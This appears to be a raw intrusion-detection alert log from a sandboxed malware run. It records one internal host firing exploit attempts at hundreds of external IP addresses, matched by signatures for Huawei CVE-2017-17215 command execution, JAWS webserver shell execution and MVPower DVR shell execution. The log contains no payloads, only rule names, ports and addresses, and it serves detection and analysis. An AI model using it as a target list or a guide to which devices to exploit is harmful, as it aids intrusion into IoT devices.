                    06/01/24-18:15:54.252981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049437215192.168.2.23156.68.148.229
                    06/01/24-18:15:55.267406TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5173480192.168.2.2313.140.185.178
                    06/01/24-18:15:53.240024TCP2025883ET EXPLOIT MVPower DVR Shell UCE5539480192.168.2.2312.95.201.102
                    06/01/24-18:15:54.240600TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3812280192.168.2.23149.39.112.106
                    06/01/24-18:15:54.253940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668637215192.168.2.23197.78.230.78
                    06/01/24-18:15:55.266193TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4098080192.168.2.2318.61.236.189
                    06/01/24-18:15:55.233813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936437215192.168.2.23156.251.227.241
                    06/01/24-18:15:54.254035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001837215192.168.2.23197.215.229.110
                    06/01/24-18:15:54.239931TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3569280192.168.2.23211.152.213.185
                    06/01/24-18:15:54.254785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617037215192.168.2.23156.47.174.21
                    06/01/24-18:15:56.246876TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4941280192.168.2.2386.86.105.40
                    06/01/24-18:15:55.267759TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5338680192.168.2.2397.94.234.176
                    06/01/24-18:15:56.308485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652837215192.168.2.23197.200.184.181
                    06/01/24-18:15:54.237830TCP2025883ET EXPLOIT MVPower DVR Shell UCE3648080192.168.2.23137.234.162.150
                    06/01/24-18:15:56.306951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862037215192.168.2.2341.121.54.211
                    06/01/24-18:15:54.251939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561237215192.168.2.2341.125.186.113
                    06/01/24-18:15:54.275477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.2341.160.105.72
                    06/01/24-18:15:54.256497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485237215192.168.2.2341.229.19.154
                    06/01/24-18:15:56.246254TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3279680192.168.2.2373.230.71.26
                    06/01/24-18:15:53.241304TCP2025883ET EXPLOIT MVPower DVR Shell UCE4206680192.168.2.23198.139.79.120
                    06/01/24-18:15:56.246905TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3596480192.168.2.23117.183.217.79
                    06/01/24-18:15:56.255398TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4372080192.168.2.23176.135.116.139
                    06/01/24-18:15:55.260064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268837215192.168.2.2341.69.68.105
                    06/01/24-18:15:54.257008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814637215192.168.2.23156.249.12.23
                    06/01/24-18:15:54.254230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922437215192.168.2.2341.43.208.255
                    06/01/24-18:15:55.262933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342037215192.168.2.23197.247.117.7
                    06/01/24-18:15:56.288115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486437215192.168.2.23156.126.149.65
                    06/01/24-18:15:53.240843TCP2025883ET EXPLOIT MVPower DVR Shell UCE4097080192.168.2.23113.32.208.233
                    06/01/24-18:15:54.253499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468437215192.168.2.23197.65.247.219
                    06/01/24-18:15:55.265864TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4664880192.168.2.2360.201.243.104
                    06/01/24-18:15:54.253835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011237215192.168.2.2341.14.133.63
                    06/01/24-18:15:54.252052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348237215192.168.2.2341.13.150.2
                    06/01/24-18:15:55.261312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568437215192.168.2.23197.27.178.48
                    06/01/24-18:15:56.306706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772437215192.168.2.23156.246.84.41
                    06/01/24-18:15:55.263597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774037215192.168.2.23156.108.129.83
                    06/01/24-18:15:55.267233TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4024080192.168.2.2383.131.30.5
                    06/01/24-18:15:54.253014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521637215192.168.2.23156.37.13.98
                    06/01/24-18:15:54.254747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557237215192.168.2.2341.109.78.181
                    06/01/24-18:15:56.308000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.2341.95.96.115
                    06/01/24-18:15:53.247074TCP2025883ET EXPLOIT MVPower DVR Shell UCE4514680192.168.2.2398.220.77.102
                    06/01/24-18:15:53.247394TCP2025883ET EXPLOIT MVPower DVR Shell UCE4476480192.168.2.235.69.223.73
                    06/01/24-18:15:54.251867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369437215192.168.2.2341.23.36.64
                    06/01/24-18:15:54.274736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013437215192.168.2.23197.168.40.142
                    06/01/24-18:15:53.238041TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4967080192.168.2.23115.246.114.148
                    06/01/24-18:15:55.265584TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4275480192.168.2.2390.165.6.182
                    06/01/24-18:15:53.241186TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4292680192.168.2.23173.201.55.115
                    06/01/24-18:15:54.254586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402637215192.168.2.23197.236.203.121
                    06/01/24-18:15:55.265445TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5614480192.168.2.2379.216.128.156
                    06/01/24-18:15:56.246425TCP2025883ET EXPLOIT MVPower DVR Shell UCE5401880192.168.2.23115.7.126.94
                    06/01/24-18:15:53.238312TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5981680192.168.2.2337.168.229.134
                    06/01/24-18:15:53.240726TCP2025883ET EXPLOIT MVPower DVR Shell UCE5084680192.168.2.2350.8.69.255
                    06/01/24-18:15:53.238282TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5559880192.168.2.2343.221.116.139
                    06/01/24-18:15:53.241698TCP2025883ET EXPLOIT MVPower DVR Shell UCE4030080192.168.2.2381.78.87.67
                    06/01/24-18:15:54.274578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822037215192.168.2.23197.173.199.249
                    06/01/24-18:15:54.274916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699037215192.168.2.23156.108.83.196
                    06/01/24-18:15:55.267260TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5737280192.168.2.23185.200.90.77
                    06/01/24-18:15:54.240296TCP2025883ET EXPLOIT MVPower DVR Shell UCE4458880192.168.2.23176.104.168.239
                    06/01/24-18:15:54.251978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117637215192.168.2.2341.144.59.161
                    06/01/24-18:15:56.307218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198237215192.168.2.2341.199.2.59
                    06/01/24-18:15:54.256554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122437215192.168.2.2341.200.45.182
                    06/01/24-18:15:54.255441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216837215192.168.2.23156.32.96.160
                    06/01/24-18:15:53.240427TCP2025883ET EXPLOIT MVPower DVR Shell UCE3426080192.168.2.23105.120.208.242
                    06/01/24-18:15:56.287004TCP2025883ET EXPLOIT MVPower DVR Shell UCE3942080192.168.2.238.213.71.177
                    06/01/24-18:15:54.254181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408637215192.168.2.2341.139.184.97
                    06/01/24-18:15:55.259864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866637215192.168.2.23197.174.153.53
                    06/01/24-18:15:55.267520TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5230880192.168.2.2382.183.211.22
                    06/01/24-18:15:54.273878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021837215192.168.2.23156.211.151.21
                    06/01/24-18:15:54.274063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954037215192.168.2.23197.225.16.119
                    06/01/24-18:15:54.238961TCP2025883ET EXPLOIT MVPower DVR Shell UCE3735080192.168.2.2366.47.79.133
                    06/01/24-18:15:56.254703TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4257680192.168.2.2336.18.192.99
                    06/01/24-18:15:53.241108TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5200880192.168.2.23198.24.255.213
                    06/01/24-18:15:56.308137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875237215192.168.2.23197.198.161.205
                    06/01/24-18:15:53.237476TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3523280192.168.2.23146.154.17.102
                    06/01/24-18:15:54.251240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861237215192.168.2.2341.193.154.175
                    06/01/24-18:15:54.240357TCP2025883ET EXPLOIT MVPower DVR Shell UCE5920280192.168.2.23104.134.7.68
                    06/01/24-18:15:54.251351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532837215192.168.2.23156.193.10.45
                    06/01/24-18:15:55.266794TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5187280192.168.2.2327.18.243.86
                    06/01/24-18:15:54.238864TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4045680192.168.2.23132.66.64.38
                    06/01/24-18:15:55.259707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286037215192.168.2.23156.86.90.224
                    06/01/24-18:15:54.252650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545837215192.168.2.2341.53.249.76
                    06/01/24-18:15:54.255507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729637215192.168.2.23197.132.75.186
                    06/01/24-18:15:55.260121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560237215192.168.2.2341.198.182.7
                    06/01/24-18:15:54.238523TCP2025883ET EXPLOIT MVPower DVR Shell UCE5802680192.168.2.2359.172.71.185
                    06/01/24-18:15:54.252766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564837215192.168.2.23197.218.44.219
                    06/01/24-18:15:54.253117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197637215192.168.2.2341.137.161.29
                    06/01/24-18:15:54.239895TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3822680192.168.2.23156.33.185.72
                    06/01/24-18:15:55.261655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769237215192.168.2.2341.237.153.229
                    06/01/24-18:15:54.274702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275837215192.168.2.2341.116.22.183
                    06/01/24-18:15:54.274543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888837215192.168.2.23197.107.164.239
                    06/01/24-18:15:54.238344TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4675480192.168.2.2352.191.152.237
                    06/01/24-18:15:55.266378TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4273680192.168.2.2314.179.235.7
                    06/01/24-18:15:54.237601TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4457480192.168.2.23168.235.31.17
                    06/01/24-18:15:55.260550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811637215192.168.2.2341.248.71.190
                    06/01/24-18:15:54.253777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5210637215192.168.2.23156.93.240.94
                    06/01/24-18:15:53.241837TCP2025883ET EXPLOIT MVPower DVR Shell UCE5717480192.168.2.2337.47.52.166
                    06/01/24-18:15:56.306901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465237215192.168.2.23156.60.77.246
                    06/01/24-18:15:54.274833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678037215192.168.2.23156.186.16.118
                    06/01/24-18:15:54.256689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295637215192.168.2.23156.95.106.67
                    06/01/24-18:15:54.240458TCP2025883ET EXPLOIT MVPower DVR Shell UCE3507880192.168.2.23157.151.151.63
                    06/01/24-18:15:56.254680TCP2025883ET EXPLOIT MVPower DVR Shell UCE3471680192.168.2.2347.229.128.11
                    06/01/24-18:15:55.267159TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4897480192.168.2.23151.12.11.94
                    06/01/24-18:15:55.233750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465837215192.168.2.23156.113.148.202
                    06/01/24-18:15:55.268402TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5096280192.168.2.23181.111.33.4
                    06/01/24-18:15:54.256369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175637215192.168.2.23156.196.70.199
                    06/01/24-18:15:55.261573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060637215192.168.2.2341.150.123.75
                    06/01/24-18:15:56.306780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038037215192.168.2.2341.223.56.124
                    06/01/24-18:15:54.239606TCP2025883ET EXPLOIT MVPower DVR Shell UCE4802680192.168.2.23124.204.6.25
                    06/01/24-18:15:56.307768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4998437215192.168.2.23197.205.140.173
                    06/01/24-18:15:54.251240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861237215192.168.2.2341.193.154.175
                    06/01/24-18:15:54.256774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453637215192.168.2.23197.248.232.76
                    06/01/24-18:15:54.274187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541437215192.168.2.2341.44.205.135
                    06/01/24-18:15:54.251665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319637215192.168.2.2341.64.231.154
                    06/01/24-18:15:54.254997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060437215192.168.2.23197.85.240.37
                    06/01/24-18:15:56.245427TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5901880192.168.2.23219.119.143.84
                    06/01/24-18:15:56.288088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379637215192.168.2.2341.199.32.68
                    06/01/24-18:15:53.238850TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3445680192.168.2.23194.252.4.200
                    06/01/24-18:15:54.252942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439437215192.168.2.2341.24.85.120
                    06/01/24-18:15:55.263544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3447037215192.168.2.23156.51.243.47
                    06/01/24-18:15:55.268432TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4259280192.168.2.23134.20.23.86
                    06/01/24-18:15:55.259198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728837215192.168.2.23197.45.25.85
                    06/01/24-18:15:53.237679TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4853080192.168.2.2391.176.40.173
                    06/01/24-18:15:54.256631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779437215192.168.2.2341.88.60.138
                    06/01/24-18:15:55.266499TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4842880192.168.2.2357.97.219.225
                    06/01/24-18:15:54.275349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491237215192.168.2.2341.247.195.212
                    06/01/24-18:15:54.274432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893437215192.168.2.23156.61.170.174
                    06/01/24-18:15:53.238244TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4494680192.168.2.2381.37.220.40
                    06/01/24-18:15:56.246669TCP2025883ET EXPLOIT MVPower DVR Shell UCE3508280192.168.2.2383.217.140.1
                    06/01/24-18:15:54.274865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369437215192.168.2.23156.95.177.47
                    06/01/24-18:15:54.251517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299837215192.168.2.23156.85.186.89
                    06/01/24-18:15:56.246748TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3795480192.168.2.23183.59.59.222
                    06/01/24-18:15:56.255398TCP2025883ET EXPLOIT MVPower DVR Shell UCE4372080192.168.2.23176.135.116.139
                    06/01/24-18:15:53.240199TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3788680192.168.2.23154.1.74.103
                    06/01/24-18:15:56.246777TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4238880192.168.2.2358.54.35.204
                    06/01/24-18:15:54.253661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556237215192.168.2.23156.207.94.97
                    06/01/24-18:15:55.266444TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4360680192.168.2.2313.35.43.213
                    06/01/24-18:15:54.255075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987437215192.168.2.2341.147.35.71
                    06/01/24-18:15:53.247100TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5436680192.168.2.2348.52.58.128
                    06/01/24-18:15:56.307705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047437215192.168.2.23156.148.149.212
                    06/01/24-18:15:54.256025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440837215192.168.2.23197.214.96.213
                    06/01/24-18:15:56.246301TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4869880192.168.2.2342.99.218.12
                    06/01/24-18:15:54.275164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847237215192.168.2.23156.240.30.191
                    06/01/24-18:15:54.251379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638637215192.168.2.2341.249.106.11
                    06/01/24-18:15:54.238074TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5598280192.168.2.23124.0.139.31
                    06/01/24-18:15:56.307739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104437215192.168.2.23197.65.82.161
                    06/01/24-18:15:55.258740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957437215192.168.2.2341.37.164.26
                    06/01/24-18:15:55.260455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100037215192.168.2.2341.117.26.254
                    06/01/24-18:15:53.241651TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4055480192.168.2.2360.55.180.73
                    06/01/24-18:15:55.263479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514437215192.168.2.2341.0.162.73
                    06/01/24-18:15:54.255124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593237215192.168.2.23156.240.0.43
                    06/01/24-18:15:56.307866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774237215192.168.2.23197.149.153.183
                    06/01/24-18:15:54.239777TCP2025883ET EXPLOIT MVPower DVR Shell UCE4986080192.168.2.23145.13.166.240
                    06/01/24-18:15:54.254354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045237215192.168.2.23156.6.171.128
                    06/01/24-18:15:54.239158TCP2025883ET EXPLOIT MVPower DVR Shell UCE4861480192.168.2.23179.122.233.207
                    06/01/24-18:15:54.239397TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4821280192.168.2.2385.238.207.251
                    06/01/24-18:15:54.253587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809637215192.168.2.23156.112.166.96
                    06/01/24-18:15:54.240252TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5094080192.168.2.2376.115.82.134
                    06/01/24-18:15:54.254379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422637215192.168.2.2341.74.251.91
                    06/01/24-18:15:54.253466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591837215192.168.2.23197.35.183.52
                    06/01/24-18:15:55.265687TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4426080192.168.2.23152.30.254.243
                    06/01/24-18:15:54.256857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5730037215192.168.2.23156.13.117.57
                    06/01/24-18:15:54.252900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989237215192.168.2.23197.176.79.105
                    06/01/24-18:15:54.239470TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4769480192.168.2.23134.80.188.68
                    06/01/24-18:15:54.240104TCP2025883ET EXPLOIT MVPower DVR Shell UCE4268280192.168.2.2313.15.216.154
                    06/01/24-18:15:54.239284TCP2025883ET EXPLOIT MVPower DVR Shell UCE5315480192.168.2.23206.73.46.114
                    06/01/24-18:15:53.239740TCP2025883ET EXPLOIT MVPower DVR Shell UCE6010480192.168.2.2358.199.54.70
                    06/01/24-18:15:54.274322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361637215192.168.2.23197.87.210.186
                    06/01/24-18:15:56.305703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000237215192.168.2.23197.169.240.113
                    06/01/24-18:15:54.254304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848637215192.168.2.2341.84.23.118
                    06/01/24-18:15:56.245293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5055680192.168.2.23159.201.245.13
                    06/01/24-18:15:56.306047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625837215192.168.2.2341.136.89.40
                    06/01/24-18:15:54.274295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602237215192.168.2.23156.19.157.15
                    06/01/24-18:15:55.268346TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3810880192.168.2.2357.95.108.136
                    06/01/24-18:15:54.239857TCP2025883ET EXPLOIT MVPower DVR Shell UCE4307280192.168.2.23107.118.12.96
                    06/01/24-18:15:54.253312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629037215192.168.2.23197.25.244.85
                    06/01/24-18:15:56.288192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305437215192.168.2.23197.121.209.235
                    06/01/24-18:15:56.305939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.23197.254.140.119
                    06/01/24-18:15:56.254180TCP2025883ET EXPLOIT MVPower DVR Shell UCE4515480192.168.2.232.239.207.135
                    06/01/24-18:15:53.238016TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6074280192.168.2.2335.40.58.241
                    06/01/24-18:15:56.254604TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5193080192.168.2.23188.65.236.49
                    06/01/24-18:15:54.251572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558637215192.168.2.2341.144.64.245
                    06/01/24-18:15:54.254529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4957237215192.168.2.23197.229.155.141
                    06/01/24-18:15:56.308432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984837215192.168.2.2341.145.26.98
                    06/01/24-18:15:55.260926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401037215192.168.2.2341.131.43.249
                    06/01/24-18:15:54.238913TCP2025883ET EXPLOIT MVPower DVR Shell UCE3319480192.168.2.23222.37.4.5
                    06/01/24-18:15:53.238939TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4956480192.168.2.2395.237.237.156
                    06/01/24-18:15:54.239435TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4437880192.168.2.2332.62.55.43
                    06/01/24-18:15:56.245977TCP2025883ET EXPLOIT MVPower DVR Shell UCE3986680192.168.2.23119.181.107.102
                    06/01/24-18:15:53.240541TCP2025883ET EXPLOIT MVPower DVR Shell UCE5453680192.168.2.23197.114.181.205
                    06/01/24-18:15:54.253534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395437215192.168.2.23156.91.55.119
                    06/01/24-18:15:56.305831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275437215192.168.2.23197.119.106.167
                    06/01/24-18:15:55.259765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590837215192.168.2.23197.165.52.203
                    06/01/24-18:15:55.262143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592837215192.168.2.23156.189.243.5
                    06/01/24-18:15:56.246060TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3545280192.168.2.2387.238.251.102
                    06/01/24-18:15:55.272711TCP2025883ET EXPLOIT MVPower DVR Shell UCE6043880192.168.2.232.243.242.44
                    06/01/24-18:15:54.240320TCP2025883ET EXPLOIT MVPower DVR Shell UCE4991280192.168.2.23116.128.48.224
                    06/01/24-18:15:54.239637TCP2025883ET EXPLOIT MVPower DVR Shell UCE4595880192.168.2.23146.155.139.101
                    06/01/24-18:15:53.247342TCP2025883ET EXPLOIT MVPower DVR Shell UCE3644280192.168.2.2377.156.147.3
                    06/01/24-18:15:56.305908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372637215192.168.2.2341.201.42.167
                    06/01/24-18:15:54.256434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402037215192.168.2.23197.204.247.193
                    06/01/24-18:15:56.288015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120437215192.168.2.2341.66.66.141
                    06/01/24-18:15:53.238108TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5821280192.168.2.2378.247.12.109
                    06/01/24-18:15:54.252848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553237215192.168.2.2341.232.72.207
                    06/01/24-18:15:54.275905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584237215192.168.2.2341.42.3.37
                    06/01/24-18:15:55.263691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729437215192.168.2.2341.24.234.239
